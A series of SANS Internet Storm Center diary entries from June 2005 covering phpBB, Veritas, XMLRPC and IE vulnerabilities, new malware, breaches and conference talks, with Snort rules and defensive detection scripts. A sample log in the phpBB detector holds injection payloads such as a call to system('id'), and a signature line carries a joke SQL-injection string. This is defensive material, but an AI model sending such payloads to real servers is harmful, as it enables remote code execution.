Published: 2005-06-30

Packet-Filtering Malware;XMLRPC Vulnerabilities;phpBB highlight vulnerability;Fake MS Bulletins

Packet-Filtering Malware

We had some readers (thanks Steve) write in regarding a new malware strategy: filtering packets instead of mucking with the local hosts file. It was mentioned in the excellent F-Secure blog, and the full description is here:


So instead of redirecting anti-virus sites such as www.pandasoftware.com, www.symantec.com and www.mcafee.com to localhost, which essentially prevents firewall and anti-virus updates from occurring, it blocks the actual network traffic. Much harder to detect and troubleshoot. I guess we need healthchecking in all of our anti-virus now, so the end user can be alerted if updates can't be retrieved (but I'm sure most users would really love to have another pop-up warning window...)
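The two techniques leave different symptoms, and a healthcheck has to look for both. The script below is an added example (not from the diary, F-Secure or any vendor) of such a check: it flags update hosts that the hosts file pins to loopback, and, for the packet-filter case, tries a real connection and treats a silent timeout (as opposed to a refusal) as the suspicious outcome. The vendor hostnames, port 80 and the embedded hosts-file sample are assumptions constructed for the example.

```python
import socket
from ipaddress import ip_address

# Update hosts to watch. The vendors are the ones named above; the exact
# hostnames and the port below are assumptions for this example.
UPDATE_HOSTS = ["www.pandasoftware.com", "www.symantec.com", "www.mcafee.com"]

# Constructed sample: a hosts file tampered with by the older technique.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
127.0.0.1   www.symantec.com      # added by malware
127.0.0.1   www.mcafee.com  mcafee.com
"""


def is_sinkhole(addr):
    """True for loopback or unspecified addresses, i.e. a name pointed nowhere."""
    try:
        ip = ip_address(addr)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_unspecified


def parse_hosts(text):
    """Return {hostname: address} for every non-comment entry of a hosts file."""
    mapping = {}
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        addr, names = fields[0], fields[1:]
        for name in names:
            mapping[name.lower()] = addr
    return mapping


def hosts_file_hijacks(text, watched=UPDATE_HOSTS):
    """Old technique: update sites pinned to loopback in the hosts file."""
    mapping = parse_hosts(text)
    return sorted(h for h in watched if is_sinkhole(mapping.get(h.lower(), "")))


def update_reachability(hosts=UPDATE_HOSTS, port=80, timeout=5.0):
    """New technique: hosts file clean, DNS answers normally, but the packets
    never get through. A connect() that times out (rather than being refused)
    is the symptom. Needs network access; returns {host: status}."""
    status = {}
    for host in hosts:
        try:
            addr = socket.gethostbyname(host)
        except socket.gaierror:
            status[host] = "dns-failed"
            continue
        if is_sinkhole(addr):
            status[host] = "sinkholed"        # hosts file or DNS points at loopback
            continue
        try:
            with socket.create_connection((addr, port), timeout=timeout):
                status[host] = "ok"
        except socket.timeout:
            status[host] = "timeout"          # silently dropped: filter suspected
        except OSError:
            status[host] = "refused"
    return status


if __name__ == "__main__":
    print("hosts-file hijacks:", hosts_file_hijacks(SAMPLE_HOSTS))
    print("live check:", update_reachability())
```

The check runs on the possibly infected machine, so malware that filters packets can just as easily filter the check's own traffic; a persistent "timeout" across several vendors is a reason to investigate from a clean host, not proof of infection on its own.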

XMLRPC Vulnerabilities (fixed)

James Bercegay wrote in regarding several security holes he discovered in XMLRPC libraries for PHP:

Version 1.1 is vulnerable to remote code execution via a careless eval call. The hole has been fixed and a patch is available.

Versions 1.3.0 and earlier are vulnerable to remote code execution. The issue has been fixed and a patch is available.

These libraries are found in a number of applications such as PostNuke, Drupal, TikiWiki, and b2evolution.

Advisory Info:





Thanks for the heads-up James and for the excellent job working with the vendors and the conscientious disclosure.


Some recent reports of click-fraud malware (Backdoor.Win32.DSSdoor.b)

Excellent technical writeup:


Reporting Phishing

If you have discovered phishing, here are some reporting links that may come in handy:


Reporting page:


Here is a resource for government reporting sites:


phpBB Highlight Vulnerability Re-introduced

We've had some folks writing in regarding Snort signatures for the new phpBB vulnerability. This vulnerability is a re-introduction of the same bug that existed in phpBB prior to 2.0.11; it was (apparently) accidentally reintroduced during work between 2.0.14 and 2.0.15. Existing Snort signatures (Sourcefire sid:2229 and Bleeding-Snort sids:2001457, 2001557, 2001604, and 2001605) will detect the common exploits.

Also, a more generic treatment of this vulnerability is as follows:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (sid:2005063001; rev:1; \
msg:"[ISC] possible phpBB <= 2.0.15 code injection"; \
flow:to_server,established; \
uricontent:"viewtopic.php|3f|"; nocase; \
pcre:"/[?&]highlight=(.\.|%27%2E|%2527%252E)\S+\(/iU"; \
classtype:misc-attack; )
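The same pattern is handy outside Snort, for example to sweep existing web server logs for attempts that predate the rule. The script below is an added example written for this diary (it is not part of the phpBB project or of the rule above): it reuses the rule's PCRE, tests the raw, once-decoded and twice-decoded URI (phpBB decodes the parameter itself, which is why exploits are double-encoded), and runs it over a few constructed Apache-style log lines. The log format and the client addresses are assumptions.

```python
import re
from urllib.parse import unquote

# Same PCRE as the generic Snort rule above: after "highlight=", a string
# terminator plus dot (raw '., once-encoded %27%2E, double-encoded %2527%252E),
# then non-blank characters up to an opening parenthesis, i.e. a function call
# spliced into the PHP expression.
HIGHLIGHT_INJECTION = re.compile(
    r"[?&]highlight=(.\.|%27%2E|%2527%252E)\S+\(", re.IGNORECASE)

# Apache combined-style access log line (assumed format); only the client
# address and the request URI are used.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*"')

# Constructed sample log: one benign search, one double-encoded attempt,
# one raw attempt.
SAMPLE_LOG = """\
192.0.2.10 - - [30/Jun/2005:10:12:01 +0000] "GET /forum/viewtopic.php?t=12&highlight=security HTTP/1.1" 200 5123
192.0.2.11 - - [30/Jun/2005:10:12:05 +0000] "GET /forum/viewtopic.php?t=12&highlight=%2527%252Esystem(%2527id%2527)%252E%2527 HTTP/1.1" 200 812
192.0.2.12 - - [30/Jun/2005:10:12:09 +0000] "GET /forum/viewtopic.php?t=12&highlight='.phpinfo().' HTTP/1.1" 200 812
"""


def is_phpbb_highlight_injection(uri):
    """True if the request URI looks like a phpBB <= 2.0.15 highlight injection."""
    if "viewtopic.php?" not in uri.lower():
        return False
    # The rule's three alternatives cover raw and encoded forms; decoding the
    # URI ourselves catches the same cases when the log stores it decoded.
    forms = {uri, unquote(uri), unquote(unquote(uri))}
    return any(HIGHLIGHT_INJECTION.search(f) for f in forms)


def scan_log(text):
    """Return [(client_ip, uri), ...] for every matching request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m and is_phpbb_highlight_injection(m.group("uri")):
            hits.append((m.group("ip"), m.group("uri")))
    return hits


if __name__ == "__main__":
    for ip, uri in scan_log(SAMPLE_LOG):
        print(ip, uri)
```

Like the rule, the pattern accepts any character before the dot, so a legitimate search term of the form `x.y(` would also match; that is the rule's trade-off between catching encoding variants and staying short, and a hit is a reason to look at the full request, not a verdict by itself.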

One Final Note: This is the bug that allowed Santy.A to work.

Windows Update Alternative

Alternative to Windows Update that many sysadmins may find useful (Thanks Matt):

For Windows 2000 SP4, WinXP SP1 and SP2 or Windows 2003 systems which have updated to the newest version of IE:


Fake Microsoft Security Bulletins Alert

A lot of reports have been streaming in regarding fake Microsoft Security Bulletins, which were recently mentioned here by Kevin Hong (http://isc.sans.org/diary.php?date=2005-06-28). It is always best to use the standard methods of patch updates (Windows|Microsoft Update) instead of relying on information or URLs provided in an email. Especially at the current time, where there is some confusion over the new Updater for XP (mentioned in yesterday's diary) and the Rollup patch for Windows 2000 SP4, which has been causing some issues in some environments. Just take a deep breath and double-check everything before executing code (updates, etc.) as Administrator.

Robert Danford

ISC Handler of the Day


Published: 2005-06-29

phpBB Update; Potential IE Vulnerability; Update Rollup for Win2k; Updated Package Installer for WinXP

Today's diary describes recent vulnerabilities in phpBB and Internet Explorer, and discusses Windows updates that Microsoft released yesterday.

phpBB 2.0.16 Fixes a Critical Security Issue

If you're using the popular phpBB bulletin board package, it's time to upgrade. Version 2.0.16, released earlier this week, fixes a critical security issue that can lead to the compromise of the vulnerable web server. The problem is with the viewtopic.php script, which fails to properly validate input when processing the "highlight" parameter. A similar vulnerability was being exploited by the Santy worm to deface web sites about half a year ago, as we reported at the time. Please update your copy of phpBB to help prevent another such worm from gaining steam.

For information about the phpBB 2.0.16 release, see the release announcement. You can get the updated package from the phpBB download site. (Thanks to ISC reader Ronaldo for discussing the implications of this issue with us.)

Potential Internet Explorer COM Vulnerability

SEC Consult reported a condition in Internet Explorer that may lead to an exploitable vulnerability. The advisory points out that Internet Explorer does not properly handle the instantiation of non-ActiveX COM objects from web pages. According to the write-up, "loading HTML documents with certain embedded CLSIDs results in null-pointer exceptions or memory corruption. in one case, we could leverage this bug to overwrite a function pointer in the data segment. it *may* be possible to exploit this issue to execute arbitrary code in the context of IE."

The published proof-of-concept code demonstrates the issue by invoking the javaprxy.dll COM object and crashing Internet Explorer, as tested in Internet Explorer 6 on Windows XP Service Pack 2. Although there are no patches to address the issue, a work-around is to disable ActiveX support in the browser. For more information about this issue, see the SEC Consult advisory.

Microsoft Releases Update Rollup for Windows 2000 SP4

Yesterday Microsoft released a package consisting of numerous patches to Windows 2000 Service Pack 4. This Update Rollup package "contains all security updates produced for Windows 2000 between the time SP4 was released and April 30, 2005, the time when the contents of the Update Rollup were locked down." Most importantly, the package "contains additional important fixes in files that have not previously been part of individual security updates." As a result, you should install this package if you are running Windows 2000 after you confirm that it doesn't conflict with your existing applications.

You can download this Update Rollup from Microsoft's Windows Update site. At the moment, the package is not available via Automatic Updates; however Microsoft indicated that it will enable Automatic Updates for the package in a few weeks. There will be no administrative tool for blocking the Update Rollup package, because it is not a formal Service Pack. Microsoft is treating this Update Rollup "like other security or reliability updates, which are normally distributed over Windows Update and via Automatic Updates."

For a listing of the post-SP4 issues that are addressed in this package, see the long table in Microsoft's Knowledge Base article. For general information about this Update Rollup, see Microsoft's announcement. Please note that this package is only applicable to Windows 2000.

This is expected to be the last mainstream update to Windows 2000, although Microsoft has committed to support the operating system until 2010. This means that the company will continue to offer security hotfixes for free until that date.

Microsoft Updates the Package Installer for Windows XP

Several readers wrote to us with questions about an unexpected notification they received yesterday from Automatic Update, asking them to install update 898461 for Windows XP. According to Microsoft, this update "installs a permanent copy of the Package Installer for Windows version on the computer so that subsequent software updates can have a significantly smaller download size." Before this update, all Package Installer files were downloaded every time you used "the Windows Update site or Automatic Updates to update the computer. This redundant download can be avoided if the installer files are made resident on the computer, because subsequent updates can use the resident files."

ISC reader Jeff pointed out that although this update is currently marked critical, it will shortly become mandatory. As Microsoft states in the Knowledge Base Article, as soon as this update "becomes mandatory, no future updates that are available from the Windows Update Web site or through Automatic Updates will include the Package Installer for Windows."

For more information about this update, see the Knowledge Base article for update 898461. Please note that this package is only applicable to Windows XP.

Lenny Zeltser

ISC Handler of the Day



Published: 2005-06-28

Bot with Veritas; Internet crash in Pakistan; MS Security Bulletin Scam; MS05-017 Exploit

Net Bot with Veritas Exploit

One of our readers reports that a new bot variant tries to exploit the new Veritas vulnerability. Infected systems start scanning tcp/10000 for further victims. The miscreants are adapting the new Veritas vulnerability into other bot variants.

Internet crash in Pakistan

Reuters reports that Pakistan has problems with Internet access and telecommunications. According to Reuters, the undersea cable link has a problem due to its power supply. You will find more information at the following link.

If anyone has more information, please report it to the ISC.

MS Security Bulletin Scam

One of our readers reports a new email scam disguised as Microsoft Security Bulletins. Users receive an email message which urges the immediate installation of an MS cumulative security patch. If the user executes the file, the user will be infected with a new bot variant. If anyone has more information, please report it to the ISC.

MS05-017 Exploit

A new exploit has been published for MS05-017, a vulnerability in Message Queuing (MSMQ) that allows a remote attacker to execute commands. It's time to patch and to filter unnecessary ports.

Kevin Hong

Handler on Duty

Published: 2005-06-27

Port 10000; ssh brute forcing; yet another bagle?

Scans for port 10000/tcp have been increasing ever since the release of the Veritas Backup Exec exploit. This exploit is now available in various easy to use forms, including a Metasploit plug-in.

At this point, we are recommending:

(1) Block traffic to/from port 10000/tcp (note: this may be a bit tricky if you don't have a stateful firewall, as port 10000/tcp may be used by various clients as an ephemeral port)

(2) Verify that all your Veritas servers are patched.

(3) Scan your network for overlooked or already exploited Veritas servers.
One reader noted that after a system has been hit with the exploit, it will no longer listen on port 10000, as the service will die. However, it will still listen on port 6101.

Snort Signatures for the exploit as used by Metasploit (from Paul Dokas. Thanks!):

alert tcp $EXTERNAL_NET any -> $HOME_NET 10000
(msg: "Possible BackupExec Exploit (inbound)";
content: "|00 00 03 00 00 02 00 58 58 58|";
offset: 24; depth: 20; classtype: attempted-admin;)
alert tcp $HOME_NET any -> $EXTERNAL_NET 10000
(msg: "Possible BackupExec Exploit (outbound)";
content: "|00 00 03 00 00 02 00 58 58 58|";
offset: 24; depth: 20; classtype: attempted-admin;)
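For triage outside the IDS, the same two facts from above (the byte pattern at offset 24, and the reader's observation that an exploited agent stops listening on 10000/tcp while 6101/tcp stays up) can be turned into a small script. The following is an added example written for this diary, not Veritas, Metasploit or Snort code: a payload check with Snort's offset/depth semantics, a classifier for port-scan results, and an optional live probe. The payload samples are constructed; the port numbers come from the diary.

```python
import socket

# Bytes the rules above look for, at offset 24 within a 20-byte window of the
# TCP payload (Snort's offset/depth semantics: the whole match must lie in the
# window, not merely start in it).
BACKUPEXEC_PATTERN = bytes.fromhex("00000300000200585858")
OFFSET, DEPTH = 24, 20


def matches_backupexec_signature(payload):
    """True if this TCP payload would trigger the content match of the rules."""
    window = payload[OFFSET:OFFSET + DEPTH]
    return BACKUPEXEC_PATTERN in window


def classify_backupexec_host(open_ports):
    """Triage a host from its open ports, using the observation that a
    successful exploit kills the 10000/tcp listener but leaves 6101/tcp up."""
    open_ports = set(open_ports)
    if 10000 in open_ports and 6101 in open_ports:
        return "backup-exec-listening"      # confirm it is patched
    if 6101 in open_ports:
        return "possibly-exploited"         # agent dead, browser alive: inspect
    if 10000 in open_ports:
        return "port-10000-open"            # agent alone, or another service (e.g. Webmin)
    return "no-backup-exec"


def probe_ports(host, ports=(6101, 10000), timeout=3.0):
    """Live check (needs network access): the subset of ports that accept a connection."""
    opened = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                opened.append(port)
        except OSError:
            pass
    return opened


# Constructed samples: filler, then the pattern placed where the rule expects it.
SAMPLE_HIT = b"\x00" * 24 + BACKUPEXEC_PATTERN + b"A" * 8
SAMPLE_MISS_EARLY = b"\x00" * 10 + BACKUPEXEC_PATTERN + b"\x00" * 30   # before the window
SAMPLE_MISS_LATE = b"\x00" * 36 + BACKUPEXEC_PATTERN                  # runs past the window


if __name__ == "__main__":
    import sys
    print("sample hit:", matches_backupexec_signature(SAMPLE_HIT))
    for target in sys.argv[1:]:
        print(target, classify_backupexec_host(probe_ports(target)))
```

A "possibly-exploited" result only means the service crashed while the box was up; the agent may have died for mundane reasons, so treat it as a prompt to look at the host (and at your IDS logs for the pattern), not as confirmation of compromise.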

Related URLs:

Veritas Announcement:




ssh brute forcing

Nothing fundamentally new. Nathaniel Hall observed a shift of attack sources from Asia to the US. Doesn't look like the nature of the attacks changed. Each source attempted to log in using a few hundred different user names.

Yet another Bagle

Frederick Lambany sent a sample of what looks like a newer Bagle version. Most AV products will catch this one using generic bagle signatures. Given the large number of bagle variants, it is hard to figure out if this one is actually new.
According to Virustotal, McAfee and Symantec are not detecting this sample at this point (will resubmit shortly to see if they have new signatures for it now).


Johannes Ullrich, Chief Research Officer, SANS Inst.

jullrich'; drop table spamaddr;'@sans.org


Published: 2005-06-26

New Bagle; RECon REPort; DC702 Summit

New Bagle Variant

We're receiving early reports of a new Bagle variant making the rounds. At the time of writing, many Antivirus products are not detecting this most recent mutation of the mass mailer. Identifying characteristics include a reference to SMS in the subject line, and ZIP attachments with various names containing an EXE named f22-013.exe with an md5 checksum of 3f123980866092fedd6bc75e9b273087. Our thanks go out to the numerous ISC readers who alerted us to this.

RECon Wrapup

I recently returned from the RECon security conference in Montreal, Canada. RECon fills a fairly unique niche as security conferences go, as its focus lies mainly on reverse engineering as it is used in security work, in addition to more general infosec material. This was the first year of the conference, and in my opinion things went very well. I'd like to take the opportunity on this "slow news day" to discuss some of the more interesting presentations from RECon. Just to note - all of the talks were great, but I'm limited on time and space, so my apologies if I didn't include something you felt was worthwhile.

Todd MacDermid

Todd gave an enlightening presentation on the privacy-focused cross-platform IM/VoIP/file-sharing application Cutlass. His presentation is available online. Cutlass aims to be the answer to private communications even for people who aren't sure why they need private communications. By having encryption as the default setting, Todd hopes to make encrypted communication the norm, rather than the exception. It's a nice idea, and one that would hopefully prevent future incidents.

Cédric Blancher

Cédric released an entertaining new tool which allows for seamless hijacking of wireless connections via traffic injection. No longer do you have to rudely knock a legitimate user offline to ... "borrow" ... his or her connection. You can be a true gentlemanly [h|cr]acker and allow them continued usage of their/your connection! Slides, code, and links to dependencies are available at the above link.

Robert E. Lee & Jack Louis

Robert and Jack had a great presentation which highlighted a few of the thousands of things wrong with the current state of web application security. They also demonstrated a useful open source web application fuzzer named "Cruiser" which found some remote code execution vulnerabilities in popular applications they were running on their production servers. Their slides are available online. Cruiser should be available any day now and will be part of their toolkit.

Jose Nazario

Jose Nazario gave a lightning-paced presentation on the simplicity of rapidly developing security tools "The Monkey Way" - aka "How To Be Leet Like Dug Song." He covers effectively using libpcap, libdnet, and libnids from various languages in order to develop the tools you need to do things that haven't been done yet. His slides are available online.

Pedram Amini

Pedram Amini demoed a fantastic new bug-hunting tool. To summarize (and probably do the tool injustice), Process Stalking allows an exploit hunter/reverse engineer to quickly whittle away the uninteresting and unimportant functions, leaving only the "stalked" functions - functions executed while attached to the process stalker - highlighted. This radically reduces binary code auditing time, and allows the reverser to spend more time exploiting and less time fishing. Additionally (what, the awesome tool wasn't enough?) Pedram launched an open community dedicated to supporting and sharing knowledge among reverse engineers. While the site is still under heavy development, it's already got some good content and looks to be coming along nicely.

Johnathan Levin

Johnathan gave an eye-opening presentation on the evils that can be easily perpetrated using Winsock 2 Layered Service Providers. These are essentially session-level plugins that can arbitrarily alter anything being passed into or out of Winsock. A benign example of this is the operation of the Google Desktop Search - search results from your local machine are injected into google.com search results via a Layered Service Provider interface. Unfortunately, like many operating system features, this has a lot of potential to be abused (hellooooo spyware!). I can't locate Johnathan's presentation online at the moment, but he'll apparently be presenting the material at DefCon as well, so if you're going to be in Vegas in a month, check it out. And, while you're there ...

DC702 Summit

Check out the DC702 Summit! It's a pre-DefCon shindig with the goal of affording easy access to various DefCon & Blackhat presenters along with other well known infosec personalities (including yours truly). This should be an intimate event with a hard limit of 200 attendees. In addition to being a great party with cool geeks, the Summit is also a fantastic fundraiser for an organization that does a lot to protect (not manage) your digital rights, so this is the perfect way to give back. In the immortal words of the song, you've got to party for your right to fight. If you've got any questions about the Summit, please send them directly to me at caltheide@isc.sans.org.

That's all for this diary, boys, girls, and prototype autonomous agents. I hope you enjoyed today's entry, and if you've got any questions or comments, you know where to reach us.


Cory Altheide

Handler Without A Cause



*"Hamfisted" is the nicest adjective I could come up with, honest.
Published: 2005-06-25

New Veritas Exploit in the wild / Geek Wall art summary / Portuguese Language Community

New Veritas Exploit

We received some reports about spikes on port 10000. The main reason for that is the release of the exploit for Veritas, which is used by the Metasploit Framework, as Marc wrote in yesterday's diary.

An excerpt of the exploit is below:

'RHOST' => [1, 'ADDR', 'The target address'],

'RPORT' => [1, 'PORT', 'The target port', 10000],

One of our readers also sent an interesting note about the usage of the new Veritas Exploit:"...So, it seems this exploit is crashing the service listening on port 10000. If sysadmins know they have backup exec installed and they scan the system they will see port 6101 and 10000 normally. After the exploit it will show only the port 6101 still listening."

Geek Wall art

I would like to thank all SANS ISC readers that sent some really interesting (and funny) ideas for Marc's request in yesterday's diary!

Below is a collection of links and poster ideas: (Thanks guys, and... I want to believe too...)

1- http://googleblog.blogspot.com/2005/04/i-googlebot.html

2- http://www.javvin.com/

3- Mural of AOL CD's

4- http://www.network-science.de/ascii/

5- http://www.chris.com/ascii/

6- http://bhami.com/rosetta.html

7- BOFH material - "yea that one caught the .308 virus... pretty near killed the operator. We're installing kevlar CPU cases next week."

8- http://www.novaspace.com/Newstuff.html

9- http://xfiles.wearehere.net/believe.htm

10- http://opte.prolexic.com (own network maps)

11- "The Cognitive Style of Powerpoint"

12- http://www.openbsd.org/orders.html#posters

In my own room, I have SANS roadmap posters, a Foundry IPv6 poster, Tripwire vulnerability matrix posters and, the best soccer team in South America (ok, that's my opinion), Flamengo.

Portuguese Language Community

This week I received a link to a website about security in the Portuguese language, called Linha Defensiva ( http://linhadefensiva.uol.com.br/ ). I would suggest you give it a try, if you can understand Portuguese.

Another one for the Brazilian community: I will be presenting SANS ISC at a conference in Sao Paulo, organized by the Brazilian Network Security Workgroup, on July 5th ( http://eng.registro.br/gts/ ).


Handler on Duty: Pedro Bueno cGJ1ZW5vQGlzYy5zYW5zLm9yZw==


Published: 2005-06-24

New Exploits and Vulnerabilities; tcp/445 Wrap-up; 40 Million Credit Cards; HP .gif; Geek Wall Art

New Exploits and Vulnerabilities

Another exploit for a recent Microsoft vulnerability has been published. Also, two new exploits were added to the Metasploit Framework. A new vulnerability in RealPlayer that allows for remote code execution was published. Not to be left out, Cisco published a vulnerability in their VPN 3000 Concentrator.

tcp/445 Wrap-up.

Based on Handler Mike Poor's request, several readers sent us their thoughts on the recent spike in tcp/445 traffic. The general consensus seems to be that there was no wide-spread Internet attack or scans. Others postulated that some locations might have been victims of "routine" scans on ports that are listed in the monthly Microsoft security advisories. Another thought was that what Symantec (and later the US-CERT and Gartner) reported was really based on increased bot activity. Regardless, we did not see any significant increases in the DShield database on tcp/445 but will continue to monitor the situation. (One footnote, a reader suggested that DShield might show a temporary rise as sensors begin to monitor tcp/445 at the request of the Internet Storm Center. Let's see what happens.)

40 Million Credit Card Thoughts

If you recall, last Friday a big story hit the wires about the exposure of 40 million credit card accounts at the Tucson office of CardSystems, a company that processes transactions on behalf of merchants and financial institutions. According to news reports, "only" 200 thousand or so accounts were actually exported by an automated tool that had access to the entire 40 million accounts. We received several notes from readers offering ideas about what happened and I'd like to dig a little deeper into one of the emails sent our way.

Dr. Neal Krawetz said on Saturday (June 18th) that he felt the compromise at CardSystems was just the most recent in a sudden increase of financial exploit reports. In the last five months he says there have been seven large compromises that we know of:

- February 2005: Bank of America lost tapes containing data for 1.2 million federal employees

- May 2005: Time Warner lost information for 600,000 employees; insiders at Bank of America and Sumitomo bank compromised accounts

- June 2005: Hackers gained access to about 600 customers at Equifax Canada; CitiFinancial blamed UPS for losing backup data; and the most recent CardSystems compromise

Prior to February, the few compromises made public were not as large and not clustered within a few months. Are these recent attacks related to increased activities of one group or gang? Or are they all coming to light because of new laws that require reporting? Or both?

Dr. Krawetz went on to say that, "at first I was thinking, 'Wow, Sarbanes/Oxley really has people reporting fraud! Wonder what wasn't reported publicly before SOX?' Now I'm wondering if these are all happening at the same time due to an organized group that found a massive weakness in the financial community..."

He continues, "Phishers and spammers generally start with a low attack volume. As they become comfortable, they increase volume and frequency. That seems to match the current pattern with these major financial compromises. Systems and processes are very similar among the financial community, leading to a homogeneous system where one attack vector will likely succeed in compromising many systems. This is why phishers target a variety of similar companies, and spammers offer an assortment of scams."

Finally he offers a conspiracy theory: "Is this the result of a few very professional (and very quiet) groups with a taste for very large compromises (Wow, what a conspiracy theory!) or a few groups that share a common knowledge? I find it hard to believe that 7 events in 5 months (or 6 events in the last 2 months) is coincidence, and copycats generally don't have the needed skill."

We still don't know "who done it" but we have some ideas. It's definitely not an adolescent script kiddie. It's also not a group that hangs out on IRC or other semi-public forums. This group understands OPSEC and is keeping their activities under close guard. I imagine that they are a bit miffed that they got caught and are taking extreme measures to prevent future detection.

Have you noticed the dramatic drop in Internet worms and viruses (except for the bots) in the past year? We have, and so have many other security experts. This is unnerving in that most of the current security protection tools are optimized for 1990s-style attacks. New attack methods slice right through firewalls, intrusion detection systems, and host-based defenses like anti virus software. We are beginning a new chapter in Internet history and I don't like the way this one is starting.

HP .gif

A reader asked if we knew what the purpose of the image at http://hp.msn.com/c/home/flight/666.gif is. He has a machine that requests that image every 30 seconds or so. We think it might be some HP software calling home to mama, but are curious if others are seeing this and have any ideas. If you do, please send them using our contact form.

Geek Wall Art

One of our readers noted that the walls around his work area are devoid of art. He asked if perhaps the Internet Storm Center readers could suggest something to cover up the cracks in the plaster. So what is hanging on your server room (or cubicle) walls? Anything cool or unique? Let us know and we'll publish a list of the good ones later this weekend if the Internet doesn't crash. Matrix posters and SANS Roadmap charts don't count. We know that everybody has those. :)

Marcus H. Sachs

Director, SANS Internet Storm Center

Handler of the Day

Published: 2005-06-23

Exploit available for MS05-011, Rumored spikes in 445 scanning

Exploit available for MS05-011, Rumored spikes in 445 scanning

FrSIRT has published exploit code for the recent flaw in Microsoft Server Message Block (SMB). The advisory and patch related to this vulnerability were released on February 8th, 2005.

If you still have not patched, you are further urged to do so in light of the release of exploit code.

Spike in 445?

There has been much media attention in the past two days to the report by Gartner that there has been a massive spike in scanning for TCP port 445.



There was a spike around the 13th of May, but nothing out of the ordinary is showing on the Dshield data.


If you have noticed a recent spike in activity, please report it to the ISC.

Mike Poor



Published: 2005-06-22

Front Page Hack Update, Veritas Advisories

Front Page Hack

First off, thanks to all who sent in log snippets, pcaps or an analysis of the Front Page hack that Joshua reported in yesterday's diary.

To sum up what we've seen, the attack seems to have been first observed back in March and may be generated by a poorly written worm.

One reader reported this to be a precursor to the download of lsd.exe, which is detected by Symantec, although the behavior that has been reported doesn't seem to match Symantec's description.

Veritas Advisories

Published: 2005-06-21

CC Theft Worries Manipulated; Unusual FrontPage Hack; War Spying/Viewing

CC Theft Worries Manipulated

An article on TMCNet's site indicates that phishers are attempting to exploit the worries of credit card holders following last week's announcement of a break-in that could have revealed up to 4 million credit card numbers. Pleasant.

EDIT (6/22/2005-13:24 UTC): Bao Nguyen writes in correcting me: the reported theft was 40 million CC numbers, not 4 million numbers. He also points out that the referenced article may be incorrect, in that other reports indicate that only 13.9 million CC numbers were MasterCard. Thanks Bao!

Unusual FrontPage Hack

Ryan Barnett (CIS Apache Benchmark Project Lead) writes in with some Snort logs indicating an attempted FrontPage hack on a system he is monitoring. The first entry indicates an attempt to exploit the chunked-encoding transfer bug:

[**] WEB-MISC Chunked-Encoding transfer attempt [**]
06/20-23:46:58.486734 ->
TCP TTL:61 TOS:0x0 ID:18331 IpLen:20 DgmLen:161 DF
***AP*** Seq: 0x5C80E4DE Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1..Host:
..Transfer-Encoding: chunked..Content-Length: 1499....

Which is a normal scan I'm sure many readers are familiar with. The unusual bit is an x86 NOOP alert that followed:

[**] SHELLCODE x86 NOOP [**]
06/20-23:46:58.489143 ->
TCP TTL:61 TOS:0x0 ID:18332 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x5C80E557 Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20

This output has been trimmed for space. Ryan indicates that there is no internal host at that address listening on port 191. If there are any other readers with similar log entries matching port 191 or the /lsd.* URL, please let us know.

War Spying/Viewing

I've taken an interest in the phenomenon of War Spying (aka War Viewing) lately. This activity targets open wireless video feeds transmitted unencrypted on the public wireless bands. Since the frequencies are public and the video traffic isn't encrypted, it's trivial for anyone with a consumer-grade video receiver to capture and record video feeds.

The idea of War Spying isn't new, but has been gaining popularity as evidenced by a few hacker videos that provide instruction on how to setup a War Spying rig:

Here's an interesting comment from one of the hackers in the From the Shadows video:

"The problem with using wireless cameras such as these for security is that anybody who has a powerful transmitter can simply override the signal, and if they have a video recording system on the back-end, the powerful signal will be recorded instead of the actual security camera. So, if someone wanted to rob the place, all they would need to do is override the signal and they would never be caught on tape."

I may be wrong, but isn't that what they did in Oceans 11? :)

Organizations concerned about the risk of War Spying are advised to identify what their exposure level is by assessing their video feeds before an attacker does. One option is to put together your own War Spying rig (see the video links for more information on doing that), or purchase a commercial handheld video scanner, such as the ICOM IC-R3.

EDIT: Reader Dean writes in with "The top of the receiving band on those is 2450 MHz, whereas the actual top of the unlicensed videocam radio band is 2474 MHz (or thereabouts)".
I believe the ISM band ends at 2462 MHz, which unfortunately means the ICOM IC-R3 radio falls a bit short. If there are other recommendations, please

UPDATE (6/22/2005-13:24 UTC): Reader Dean writes us again (muchas gracias Dean!) citing Part 15 FCC rules that indicate the upper end of the ISM band in the US is 2.4835 GHz. This means that the ICOM unit will not be capable of identifying open video signals in the upper portions of the allowable spectrum. I've sent ICOM an email message to find out if it's possible to extend the IC-R3 functionality to include this band as well.

-Joshua Wright/Handler-on-Duty

Published: 2005-06-20

Administrata; MS05-026 exploits in the field? No, not really; OpenRBL ist Kaput; Passive Reconnaissance and the Disaster Response threat-space; mod_jrun exploit sweep


This is the after-lunch update, I usually like to have a morning, afternoon, and closing commentary updates, but wanted to let Lorna’s fine overview on the risks of moving and Identity Theft get a bit more eye-ball time. One should go back and read the weekend’s Diaries as a part of their Monday morning exercises.

MS05-026 exploits in the field?

The first incident of my shift involved an active exploit of MS05-026 (ED: no, Kevin, it’s actually MS05-001 as we see below.) A spam message was blasted out to potential “customers,” including the link to the poisoned website. It leveraged the MS05-026 (MS05-001, see above) (http://www.microsoft.com/technet/security/bulletin/MS05-001.mspx) HTML Help remote code execution (no, Security zone bypass) vulnerability to install a Haxdoor variant on the visitor (well, I got one part right.)

Update: The following AV tools detect the initial Help Control Exploit

Antivirus     Version          Update       Result
ClamAV        devel-20050501   06.20.2005   Exploit.Helpcontrol
eTrust-Iris                    06.19.2005   HTML/HelpControl!Exploit!Trojan
eTrust-Vet                     06.20.2005   HTML.HelpControl!exploit
Fortinet                       06.20.2005   VBS/Phel.A-trM
Sybari        7.5.1314         06.20.2005   HTML/HelpControl!Exploit!Trojan

The following AV tools detect the Trojan dropped:

Antivirus Version Update Result

AntiVir 06.20.2005 BDS/Haxdoor.CW

